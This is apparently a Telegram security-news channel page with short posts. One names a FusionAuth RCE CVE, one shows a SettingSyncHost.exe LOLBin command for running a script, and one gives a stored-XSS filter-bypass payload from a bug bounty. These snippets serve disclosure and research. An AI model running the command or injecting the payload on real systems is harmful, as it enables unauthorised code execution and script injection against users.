Information Security
408 subscribers
157 photos
5 videos
9 files
2.28K links
Information Security News

we are @sec_nerd twin brother
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2020-7799 FusionAuth RCE via Apache Freemarker Template
This media is not supported in your browser
VIEW IN TELEGRAM
SettingSyncHost.exe as a LolBin

http://hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/

#LOLBIN

cd %TEMP% & c:\windows\system32\SettingSyncHost.exe -LoadAndRunDiagScript foo
XSS filter bypass using stripped </p> tag to obfuscate.

P2 Stored XSS $1500 on a private bug bounty program.

XSS Payload:
<</p>iframe src=javascript:alert()//